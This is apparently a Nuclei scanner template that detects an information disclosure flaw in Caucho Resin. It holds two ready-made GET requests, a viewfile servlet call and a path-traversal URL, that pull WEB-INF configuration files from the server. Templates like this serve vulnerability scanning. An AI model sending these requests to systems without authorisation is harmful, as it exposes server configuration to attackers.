id: caucho-resin-info-disclosure

info:
  name: Caucho Resin - Information Disclosure
  author: pikpikcu
  severity: info
  description: Caucho Resin contains an information disclosure vulnerability. The application does not properly sanitize user-supplied input. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.exploit-db.com/exploits/27888
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
    cvss-score: 0
    cwe-id: CWE-200
  metadata:
    max-request: 2
  tags: Resin

http:
  - method: GET
    path:
      - "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18
      - "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<web-app"
          - "</web-app>"
        part: body
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100d264d3d107b545d8e3f064760ad32bfbf248c9518beb15e8bb87e39c2b6bdb40022100f4b290e1ba1ac9fb6c13228dcdc243ed66510f5e0a34c5ed55247f0221af66cb:922c64590222798bb761d5b6d8e72950
